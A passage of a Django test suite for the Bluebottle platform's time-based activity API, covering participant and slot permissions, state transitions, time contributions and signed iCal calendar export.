response = self.client.delete(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_delete_other(self):
response = self.client.delete(
self.url, user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_delete_anonymous(self):
response = self.client.delete(self.url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_delete_open_activity(self):
self.activity.initiative.states.submit()
self.activity.initiative.states.approve(save=True)
self.activity.states.submit(save=True)
response = self.client.delete(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class ParticipantListViewTestCase():
def setUp(self):
super().setUp()
self.client = JSONAPITestClient()
self.user = BlueBottleUserFactory()
self.activity = self.factory.create()
self.url = reverse(self.url_name)
self.private_document_url = reverse('private-document-list')
self.png_document_path = './bluebottle/files/tests/files/test-image.png'
self.data = {
'data': {
'type': self.participant_type,
'attributes': {
'motiviation': 'I am great',
},
'relationships': {
'activity': {
'data': {
'type': 'activities/time-based/{}s'.format(self.type),
'id': self.activity.pk
}
}
}
}
}
def test_create(self):
self.response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)
data = self.response.json()['data']
self.assertEqual(
data['relationships']['user']['data']['id'],
str(self.user.pk)
)
self.assertEqual(
data['meta']['permissions']['GET'],
True
)
self.assertEqual(
data['meta']['permissions']['PUT'],
True
)
self.assertEqual(
data['meta']['permissions']['PATCH'],
True
)
def test_create_with_document(self):
with open(self.png_document_path, 'rb') as test_file:
document_response = self.client.post(
self.private_document_url,
test_file.read(),
content_type="image/png",
HTTP_CONTENT_DISPOSITION='attachment; filename="test.rtf"',
user=self.user
)
self.assertEqual(document_response.status_code, 201)
document_data = json.loads(document_response.content)
self.data['data']['relationships']['document'] = {
'data': {
'type': 'private-documents',
'id': document_data['data']['id']
}
}
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, 201)
data = response.json()['data']
self.assertEqual(
data['relationships']['document']['data']['id'],
document_data['data']['id']
)
private_doc = self.included_by_type(response, 'private-documents')[0]
self.assertTrue(
private_doc['attributes']['link'].startswith(
'{}?signature='.format(reverse(self.document_url_name, args=(data['id'],)))
)
)
def test_create_duplicate(self):
self.client.post(self.url, json.dumps(self.data), user=self.user)
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.json()['errors'][0]['detail'],
'The fields activity, user must make a unique set.'
)
def test_create_anonymous(self):
response = self.client.post(self.url, json.dumps(self.data))
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_get_participants(self):
self.test_create()
self.response = self.client.get(self.url)
self.assertEqual(self.response.status_code, status.HTTP_200_OK)
class DateParticipantListAPIViewTestCase(ParticipantListViewTestCase, BluebottleTestCase):
type = 'date'
factory = DateActivityFactory
participant_factory = DateParticipantFactory
document_url_name = 'date-participant-document'
application_type = 'contributions/time-based/date-participants'
url_name = 'date-participant-list'
participant_type = 'contributors/time-based/date-participants'
def test_create(self):
super().test_create()
types = [included['type'] for included in self.response.json()['included']]
self.assertTrue('contributors/time-based/slot-participants' in types)
def test_get_participants(self):
super().test_get_participants()
types = [included['type'] for included in self.response.json()['included']]
self.assertFalse('contributors/time-based/slot-participants' in types)
class PeriodParticipantListAPIViewTestCase(ParticipantListViewTestCase, BluebottleTestCase):
type = 'period'
factory = PeriodActivityFactory
participant_factory = PeriodParticipantFactory
url_name = 'period-participant-list'
document_url_name = 'period-participant-document'
participant_type = 'contributors/time-based/period-participants'
class ParticipantDetailViewTestCase():
def setUp(self):
super().setUp()
self.client = JSONAPITestClient()
self.user = BlueBottleUserFactory()
self.activity = self.factory.create()
self.participant = self.participant_factory(
activity=self.activity,
motivation='My motivation'
)
self.url = reverse(self.url_name, args=(self.participant.pk,))
self.private_document_url = reverse('private-document-list')
self.png_document_path = './bluebottle/files/tests/files/test-image.png'
self.data = {
'data': {
'type': self.participant_type,
'id': self.participant.pk,
'attributes': {'motivation': 'Let\'s go!!!'},
}
}
def test_get_user(self):
response = self.client.get(self.url, user=self.participant.user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(
data['attributes']['motivation'],
self.participant.motivation
)
self.assertEqual(
data['relationships']['user']['data']['id'],
str(self.participant.user.pk)
)
self.assertEqual(
data['meta']['permissions']['GET'],
True
)
self.assertEqual(
data['meta']['permissions']['PUT'],
True
)
self.assertEqual(
data['meta']['permissions']['PATCH'],
True
)
self.assertTrue(
{'name': 'withdraw', 'target': 'withdrawn', 'available': True}
in data['meta']['transitions']
)
def test_get_owner(self):
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.data = response.json()['data']
self.assertEqual(
self.data['attributes']['motivation'],
self.participant.motivation
)
self.assertFalse(
{'name': 'withdraw', 'target': 'withdrawn', 'available': True}
in self.data['meta']['transitions']
)
self.assertTrue(
{'name': 'remove', 'target': 'rejected', 'available': True}
in self.data['meta']['transitions']
)
def test_get_activity_manager(self):
response = self.client.get(self.url, user=self.activity.initiative.activity_managers.first())
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(
data['attributes']['motivation'],
self.participant.motivation
)
def test_get_other_user(self):
response = self.client.get(self.url, user=self.user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertIsNone(
data['attributes']['motivation']
)
def test_patch_user(self):
response = self.client.patch(self.url, json.dumps(self.data), user=self.participant.user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(
data['attributes']['motivation'],
self.data['data']['attributes']['motivation']
)
def test_patch_document(self):
with open(self.png_document_path, 'rb') as test_file:
document_response = self.client.post(
self.private_document_url,
test_file.read(),
content_type="image/png",
HTTP_CONTENT_DISPOSITION='attachment; filename="test.rtf"',
user=self.user
)
self.assertEqual(document_response.status_code, 201)
document_data = json.loads(document_response.content)
self.data['data']['relationships'] = {
'document': {
'data': {
'type': 'private-documents',
'id': document_data['data']['id']
}
}
}
response = self.client.patch(self.url, json.dumps(self.data), user=self.participant.user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(
data['relationships']['document']['data']['id'],
document_data['data']['id']
)
def test_patch_other_user(self):
response = self.client.patch(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_patch_anonymous(self):
response = self.client.patch(self.url, json.dumps(self.data))
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class DateParticipantDetailAPIViewTestCase(ParticipantDetailViewTestCase, BluebottleTestCase):
type = 'date'
factory = DateActivityFactory
participant_factory = DateParticipantFactory
url_name = 'date-participant-detail'
participant_type = 'contributors/time-based/date-participants'
class PeriodParticipantDetailAPIViewTestCase(ParticipantDetailViewTestCase, BluebottleTestCase):
type = 'period'
factory = PeriodActivityFactory
participant_factory = PeriodParticipantFactory
url_name = 'period-participant-detail'
participant_type = 'contributors/time-based/period-participants'
def test_get_owner(self):
super().test_get_owner()
self.assertTrue(
{'name': 'remove', 'target': 'rejected', 'available': True}
in self.data['meta']['transitions']
)
class ParticipantTransitionAPIViewTestCase():
def setUp(self):
super().setUp()
self.client = JSONAPITestClient()
self.user = BlueBottleUserFactory()
self.activity = self.factory.create()
self.participant = self.participant_factory.create(
activity=self.activity
)
self.url = reverse(self.url_name)
self.data = {
'data': {
'type': '{}-transitions'.format(self.participant_type),
'attributes': {},
'relationships': {
'resource': {
'data': {
'type': '{}s'.format(self.participant_type),
'id': self.participant.pk
}
}
}
}
}
def test_withdraw_by_user(self):
# Owner can delete the event
self.data['data']['attributes']['transition'] = 'withdraw'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.participant.user
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
data = json.loads(response.content)
participant = [
include for include in data['included'] if include['type'] == '{}s'.format(self.participant_type)
]
self.assertEqual(len(participant), 1)
self.assertEqual(participant[0]['attributes']['status'], 'withdrawn')
def test_withdraw_by_other_user(self):
# Owner can delete the event
self.data['data']['attributes']['transition'] = 'withdraw'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.user
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_remove_by_activity_owner(self):
# Owner can delete the event
self.data['data']['attributes']['transition'] = 'remove'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
data = json.loads(response.content)
participant = [
include for include in data['included'] if include['type'] == '{}s'.format(self.participant_type)
]
self.assertEqual(len(participant), 1)
self.assertEqual(participant[0]['attributes']['status'], 'rejected')
def test_remove_by_user(self):
self.data['data']['attributes']['transition'] = 'remove'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.participant.user
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
class DateParticipantTransitionAPIViewTestCase(ParticipantTransitionAPIViewTestCase, BluebottleTestCase):
type = 'date'
url_name = 'date-participant-transition-list'
participant_type = 'contributors/time-based/date-participant'
factory = DateActivityFactory
participant_factory = DateParticipantFactory
class PeriodParticipantTransitionAPIViewTestCase(ParticipantTransitionAPIViewTestCase, BluebottleTestCase):
type = 'period'
participant_type = 'contributors/time-based/period-participant'
url_name = 'period-participant-transition-list'
factory = PeriodActivityFactory
participant_factory = PeriodParticipantFactory
class ReviewParticipantTransitionAPIViewTestCase():
def setUp(self):
super().setUp()
self.client = JSONAPITestClient()
self.user = BlueBottleUserFactory()
self.activity = self.factory.create(review=True)
self.participant = self.participant_factory.create(
activity=self.activity
)
self.url = reverse(self.url_name)
self.data = {
'data': {
'type': '{}-transitions'.format(self.participant_type),
'attributes': {},
'relationships': {
'resource': {
'data': {
'type': '{}s'.format(self.participant_type),
'id': self.participant.pk
}
}
}
}
}
def test_withdraw_by_user(self):
# Owner can delete the event
self.data['data']['attributes']['transition'] = 'withdraw'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.participant.user
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
data = json.loads(response.content)
participant = [
include for include in data['included'] if include['type'] == '{}s'.format(self.participant_type)
]
self.assertEqual(len(participant), 1)
self.assertEqual(participant[0]['attributes']['status'], 'withdrawn')
def test_withdraw_by_other_user(self):
# Owner can delete the event
self.data['data']['attributes']['transition'] = 'withdraw'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.user
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_reject_by_activity_owner(self):
# Owner can delete the event
self.data['data']['attributes']['transition'] = 'reject'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
data = json.loads(response.content)
participant = [
include for include in data['included'] if include['type'] == '{}s'.format(self.participant_type)
]
self.assertEqual(len(participant), 1)
self.assertEqual(participant[0]['attributes']['status'], 'rejected')
def test_reject_by_user(self):
# Owner can delete the event
self.data['data']['attributes']['transition'] = 'reject'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.participant.user
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
class DateReviewParticipantTransitionAPIViewTestCase(
ReviewParticipantTransitionAPIViewTestCase, BluebottleTestCase
):
type = 'date'
url_name = 'date-participant-transition-list'
participant_type = 'contributors/time-based/date-participant'
factory = DateActivityFactory
participant_factory = DateParticipantFactory
class PeriodReviewParticipantTransitionAPIViewTestCase(
ReviewParticipantTransitionAPIViewTestCase, BluebottleTestCase
):
type = 'period'
participant_type = 'contributors/time-based/period-participant'
url_name = 'period-participant-transition-list'
factory = PeriodActivityFactory
participant_factory = PeriodParticipantFactory
class RelatedParticipantsAPIViewTestCase():
def setUp(self):
super().setUp()
self.client = JSONAPITestClient()
self.activity = self.factory.create()
self.participants = []
for i in range(10):
self.participants.append(
self.participant_factory.create(
activity=self.activity,
document=PrivateDocumentFactory.create()
)
)
self.participants[0].states.remove(save=True)
self.participants[1].states.remove(save=True)
self.url = reverse(self.url_name, args=(self.activity.pk,))
def test_get_owner(self):
self.response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(self.response.status_code, status.HTTP_200_OK)
self.assertEqual(len(self.response.json()['data']), 10)
included_documents = self.included_by_type(self.response, 'private-documents')
self.assertEqual(len(included_documents), 10)
def test_get_with_duplicate_files(self):
file = PrivateDocumentFactory.create(owner=self.participants[2].user)
self.participants[2].document = file
self.participants[2].save()
self.participants[3].document = file
self.participants[3].save()
self.response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(self.response.status_code, status.HTTP_200_OK)
self.assertEqual(len(self.response.json()['data']), 10)
included_documents = self.included_by_type(self.response, 'private-documents')
self.assertEqual(len(included_documents), 9)
def test_get_anonymous(self):
self.response = self.client.get(self.url)
self.assertEqual(self.response.status_code, status.HTTP_200_OK)
self.assertEqual(len(self.response.json()['data']), 8)
included_documents = self.included_by_type(self.response, 'private-documents')
self.assertEqual(len(included_documents), 0)
def test_get_removed_participant(self):
self.response = self.client.get(self.url, user=self.participants[0].user)
self.assertEqual(self.response.status_code, status.HTTP_200_OK)
self.assertEqual(len(self.response.json()['data']), 9)
included_documents = self.included_by_type(self.response, 'private-documents')
self.assertEqual(len(included_documents), 1)
def test_get_closed_site(self):
MemberPlatformSettings.objects.update(closed=True)
group = Group.objects.get(name='Anonymous')
group.permissions.remove(Permission.objects.get(codename='api_read_dateparticipant'))
group.permissions.remove(Permission.objects.get(codename='api_read_periodparticipant'))
response = self.client.get(self.url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class RelatedDateParticipantAPIViewTestCase(RelatedParticipantsAPIViewTestCase, BluebottleTestCase):
type = 'date'
url_name = 'date-participants'
participant_type = 'contributors/time-based/date-participant'
factory = DateActivityFactory
participant_factory = DateParticipantFactory
def setUp(self):
super().setUp()
self.client = JSONAPITestClient()
self.activity = self.factory.create(slot_selection='free')
DateActivitySlotFactory.create(activity=self.activity)
self.participants = []
for i in range(10):
participant = self.participant_factory.create(
activity=self.activity,
document=PrivateDocumentFactory.create()
)
for slot in self.activity.slots.all():
SlotParticipantFactory.create(
participant=participant,
slot=slot
)
self.participants.append(
participant
)
self.participants[0].states.remove(save=True)
self.participants[1].states.remove(save=True)
self.participants[2].slot_participants.all()[0].states.remove(save=True)
self.url = reverse(self.url_name, args=(self.activity.pk,))
def test_get_owner(self):
super().test_get_owner()
self.assertEqual(len(self.response.data), 10)
self.assertEqual(self.response.data[0]['permissions']['PUT'], True)
def test_get_anonymous(self):
super().test_get_anonymous()
self.assertEqual(len(self.response.data), 8)
self.assertEqual(self.response.data[0]['permissions']['PUT'], False)
def test_get_removed_participant(self):
super().test_get_removed_participant()
self.assertEqual(len(self.response.data), 9)
class RelatedPeriodParticipantAPIViewTestCase(RelatedParticipantsAPIViewTestCase, BluebottleTestCase):
type = 'period'
url_name = 'period-participants'
participant_type = 'contributors/time-based/period-participant'
factory = PeriodActivityFactory
participant_factory = PeriodParticipantFactory
def test_get_owner(self):
super().test_get_owner()
included_contributions = self.included_by_type(self.response, 'contributions/time-contributions')
self.assertEqual(len(included_contributions), 10)
class SlotParticipantListAPIViewTestCase(BluebottleTestCase):
def setUp(self):
super().setUp()
self.client = JSONAPITestClient()
self.activity = DateActivityFactory.create(review=False, slot_selection='free')
self.slot = DateActivitySlotFactory.create(activity=self.activity)
self.participant = DateParticipantFactory.create(activity=self.activity)
self.url = reverse('slot-participant-list')
self.data = {
'data': {
'type': 'contributors/time-based/slot-participants',
'relationships': {
'slot': {
'data': {
'type': 'activities/time-based/date-slots', 'id': self.slot.id
},
},
'participant': {
'data': {
'type': 'contributors/time-based/date-participants',
'id': self.participant.id
},
},
}
}
}
def test_create_participant_user(self):
response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
data = response.json()['data']
self.assertEqual(
data['relationships']['slot']['data']['id'], str(self.slot.pk)
)
self.assertEqual(
data['relationships']['participant']['data']['id'], str(self.participant.pk)
)
self.assertEqual(data['id'], str(self.participant.slot_participants.get().pk))
def test_create_participant_user_full(self):
self.slot.capacity = 1
self.slot.save()
SlotParticipantFactory.create(slot=self.slot)
response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_participant_user_twice(self):
response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_different_user(self):
response = self.client.post(self.url, json.dumps(self.data), user=BlueBottleUserFactory.create())
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_create_activity_owner(self):
response = self.client.post(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_create_no_user(self):
response = self.client.post(self.url, json.dumps(self.data))
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_create_different_slot(self):
activity = DateActivityFactory.create()
slot = DateActivitySlotFactory.create(activity=activity)
self.data['data']['relationships']['slot']['data']['id'] = slot.pk
response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_missing_slot(self):
del self.data['data']['relationships']['slot']
response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_missing_participant(self):
del self.data['data']['relationships']['participant']
response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
class SlotParticipantDetailAPIViewTestCase(BluebottleTestCase):
def setUp(self):
super().setUp()
self.client = JSONAPITestClient()
self.owner = BlueBottleUserFactory.create()
self.random_user = BlueBottleUserFactory.create()
self.supporter1 = BlueBottleUserFactory.create()
self.supporter2 = BlueBottleUserFactory.create()
self.activity = DateActivityFactory.create(
review=False,
owner=self.owner
)
self.slot = DateActivitySlotFactory.create(activity=self.activity)
self.participant1 = DateParticipantFactory.create(
user=self.supporter1,
activity=self.activity
)
self.participant2 = DateParticipantFactory.create(
user=self.supporter2,
activity=self.activity
)
self.participant2.states.withdraw(save=True)
p1_sl1 = SlotParticipant.objects.get(slot=self.slot, participant=self.participant1)
p2_sl1 = SlotParticipant.objects.get(slot=self.slot, participant=self.participant2)
self.url_part1_slot1 = reverse('slot-participant-detail', args=(p1_sl1.id,))
self.url_part2_slot1 = reverse('slot-participant-detail', args=(p2_sl1.id,))
def test_get_slot_participant(self):
MemberPlatformSettings.objects.update(closed=True)
response = self.client.get(self.url_part1_slot1, user=self.supporter1)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response = self.client.get(self.url_part2_slot1, user=self.supporter1)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
response = self.client.get(self.url_part1_slot1, user=self.owner)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
response = self.client.get(self.url_part2_slot1, user=self.random_user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class SlotParticipantTransitionAPIViewTestCase(BluebottleTestCase):
def setUp(self):
super().setUp()
self.client = JSONAPITestClient()
self.activity = DateActivityFactory.create()
self.slot = DateActivitySlotFactory.create(activity=self.activity)
self.participant = DateParticipantFactory.create(activity=self.activity)
self.slot_participant = self.participant.slot_participants.get(
participant=self.participant, slot=self.slot
)
self.url = reverse('slot-participant-transition-list')
self.data = {
'data': {
'type': 'contributors/time-based/slot-participant-transitions',
'attributes': {},
'relationships': {
'resource': {
'data': {
'type': 'contributors/time-based/slot-participants',
'id': self.slot_participant.pk
}
}
}
}
}
def test_withdraw_by_user(self):
self.data['data']['attributes']['transition'] = 'withdraw'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.participant.user
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
data = json.loads(response.content)
self.assertEqual(
data['included'][2]['type'],
'contributors/time-based/slot-participants'
)
self.assertEqual(data['included'][2]['meta']['status'], 'withdrawn')
def test_reapply_by_user(self):
self.test_withdraw_by_user()
self.data['data']['attributes']['transition'] = 'reapply'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.participant.user
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
data = json.loads(response.content)
self.assertEqual(data['included'][2]['meta']['status'], 'registered')
def test_withdraw_by_owner(self):
self.data['data']['attributes']['transition'] = 'withdraw'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_reapply_by_owner(self):
self.test_withdraw_by_user()
self.data['data']['attributes']['transition'] = 'reapply'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_remove_by_owner(self):
self.data['data']['attributes']['transition'] = 'remove'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
data = json.loads(response.content)
self.assertEqual(data['included'][2]['meta']['status'], 'removed')
def test_accept_by_owner(self):
self.test_remove_by_owner()
self.data['data']['attributes']['transition'] = 'accept'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
data = json.loads(response.content)
self.assertEqual(data['included'][2]['meta']['status'], 'registered')
def test_remove_by_user(self):
self.data['data']['attributes']['transition'] = 'remove'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.participant.user
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_accept_by_user(self):
self.test_remove_by_owner()
self.data['data']['attributes']['transition'] = 'accept'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.participant.user
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
class TimeContributionDetailAPIViewTestCase():
def setUp(self):
super().setUp()
self.client = JSONAPITestClient()
self.activity = self.factory.create()
self.participant = self.participant_factory.create(
activity=self.activity
)
self.contribution = self.participant.contributions.get()
self.url = reverse(
'time-contribution-detail',
args=(self.contribution.pk,)
)
self.data = {
'data': {
'type': 'contributions/time-contributions',
'id': self.contribution.pk,
'attributes': {
'value': '5:00:00'
}
}
}
def test_get_owner(self):
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(
response.json()['data']['meta']['permissions']['PUT']
)
def test_get_contributor(self):
response = self.client.get(self.url, user=self.participant.user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_get_other(self):
response = self.client.get(self.url, user=BlueBottleUserFactory.create())
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_get_anonymous(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_put_owner(self):
response = self.client.put(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.contribution.refresh_from_db()
self.assertEqual(self.contribution.value, timedelta(hours=5))
def test_put_contributor(self):
response = self.client.put(self.url, json.dumps(self.data), user=self.participant.user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_put_other(self):
response = self.client.put(self.url, json.dumps(self.data), user=BlueBottleUserFactory.create())
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_put_anonymous(self):
response = self.client.put(self.url, json.dumps(self.data))
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class DateTimeContributionAPIViewTestCase(TimeContributionDetailAPIViewTestCase, BluebottleTestCase):
factory = DateActivityFactory
participant_factory = DateParticipantFactory
class PeriodTimeContributionAPIViewTestCase(TimeContributionDetailAPIViewTestCase, BluebottleTestCase):
factory = PeriodActivityFactory
participant_factory = PeriodParticipantFactory
class SlotIcalTestCase(BluebottleTestCase):
def setUp(self):
super().setUp()
self.user = BlueBottleUserFactory.create()
self.client = JSONAPITestClient()
self.initiative = InitiativeFactory.create(status='approved')
self.activity = DateActivityFactory.create(
title='Pollute Katwijk Beach',
owner=self.user,
initiative=self.initiative
)
self.slot = self.activity.slots.first()
self.slot.is_online = True
self.slot.online_meeting_url = 'http://example.com'
self.slot.save()
self.slot_url = reverse('date-slot-detail', args=(self.slot.pk,))
self.activity.states.submit(save=True)
self.client = JSONAPITestClient()
response = self.client.get(self.slot_url, user=self.user)
self.signed_url = response.json()['data']['attributes']['links']['ical']
self.unsigned_url = reverse('slot-ical', args=(self.activity.pk,))
def test_get(self):
response = self.client.get(self.signed_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.get('content-type'), 'text/calendar')
self.assertEqual(
response.get('content-disposition'),
'attachment; filename="{}.ics"'.format(self.activity.slug)
)
calendar = icalendar.Calendar.from_ical(response.content)
for ical_event in calendar.walk('vevent'):
self.assertAlmostEqual(
ical_event['dtstart'].dt,
self.slot.start,
delta=timedelta(seconds=10)
)
self.assertAlmostEqual(
ical_event['dtend'].dt,
self.slot.start + self.slot.duration,
delta=timedelta(seconds=10)
)
self.assertEqual(ical_event['dtstart'].dt.tzinfo, utc)
self.assertEqual(ical_event['dtend'].dt.tzinfo, utc)
self.assertEqual(str(ical_event['summary']), self.activity.title)
self.assertEqual(
str(ical_event['description']),
'{}\n{}\nJoin: {}'.format(
self.activity.description,
self.activity.get_absolute_url(),
self.slot.online_meeting_url
)
)
self.assertEqual(ical_event['url'], self.activity.get_absolute_url())
self.assertEqual(ical_event['organizer'], 'MAILTO:{}'.format(self.activity.owner.email))
def test_get_no_signature(self):
response = self.client.get(self.unsigned_url)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_get_wrong_signature(self):
response = self.client.get('{}?signature=ewiorjewoijical_url'.format(self.unsigned_url))
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class DateIcalTestCase(BluebottleTestCase):
def setUp(self):
super().setUp()
self.activity = DateActivityFactory.create(
title='Pollute Katwijk Beach',
slots=[]
)
self.slots = DateActivitySlotFactory.create_batch(
3,
activity=self.activity,
is_online=True,
online_meeting_url='http://example.com'
)
self.user = BlueBottleUserFactory.create()
self.client = JSONAPITestClient()
self.activity_url = reverse('date-detail', args=(self.activity.pk,))
response = self.client.get(self.activity_url, user=self.user)
self.signed_url = response.json()['data']['attributes']['links']['ical']
self.unsigned_url = reverse('slot-ical', args=(self.activity.pk,))
def test_get_applied_to_all(self):
DateParticipantFactory.create(activity=self.activity, user=self.user)
response = self.client.get(self.signed_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.get('content-type'), 'text/calendar')
self.assertEqual(
response.get('content-disposition'),
'attachment; filename="{}.ics"'.format(self.activity.slug)
)
calendar = icalendar.Calendar.from_ical(response.content)
self.assertEqual(len(calendar.walk('vevent')), 3)
for index, ical_event in enumerate(calendar.walk('vevent')):
slot = self.slots[index]
self.assertAlmostEqual(
ical_event['dtstart'].dt,
slot.start,
delta=timedelta(seconds=10)
)
self.assertAlmostEqual(
ical_event['dtend'].dt,
slot.start + slot.duration,
delta=timedelta(seconds=10)
)
self.assertEqual(ical_event['dtstart'].dt.tzinfo, utc)
self.assertEqual(ical_event['dtend'].dt.tzinfo, utc)
self.assertEqual(str(ical_event['summary']), self.activity.title)
self.assertEqual(
str(ical_event['description']),
'{}\n{}\nJoin: {}'.format(
self.activity.description,
self.activity.get_absolute_url(),
slot.online_meeting_url
)
)
self.assertEqual(ical_event['url'], self.activity.get_absolute_url())
self.assertEqual(ical_event['organizer'], 'MAILTO:{}'.format(self.activity.owner.email))
def test_get_applied_to_first(self):
self.activity.slot_selection = 'free'
self.activity.save()
participant = DateParticipantFactory.create(activity=self.activity, user=self.user)
SlotParticipantFactory.create(slot=self.slots[0], participant=participant)
response = self.client.get(self.signed_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.get('content-type'), 'text/calendar')
self.assertEqual(
response.get('content-disposition'),
'attachment; filename="{}.ics"'.format(self.activity.slug)
)
calendar = icalendar.Calendar.from_ical(response.content)
self.assertEqual(len(calendar.walk('vevent')), 1)
slot = self.slots[0]
ical_event = list(calendar.walk('vevent'))[0]
self.assertAlmostEqual(
ical_event['dtstart'].dt,
slot.start,
delta=timedelta(seconds=10)
)
self.assertAlmostEqual(
ical_event['dtend'].dt,
slot.start + slot.duration,
delta=timedelta(seconds=10)
)
self.assertEqual(ical_event['dtstart'].dt.tzinfo, utc)
self.assertEqual(ical_event['dtend'].dt.tzinfo, utc)
self.assertEqual(str(ical_event['summary']), self.activity.title)
self.assertEqual(
str(ical_event['description']),
'{}\n{}\nJoin: {}'.format(
self.activity.description,
self.activity.get_absolute_url(),
slot.online_meeting_url
)
)
self.assertEqual(ical_event['url'], self.activity.get_absolute_url())
self.assertEqual(ical_event['organizer'], 'MAILTO:{}'.format(self.activity.owner.email))
def test_get_no_signature(self):
response = self.client.get(self.unsigned_url)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_get_wrong_signature(self):
response = self.client.get('{}?signature=ewiorjewoijical_url'.format(self.unsigned_url))
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class SkillApiTestCase(BluebottleTestCase):
def setUp(self):
super().setUp()
MemberPlatformSettings.objects.update(closed=True)
self.url = reverse('skill-list')
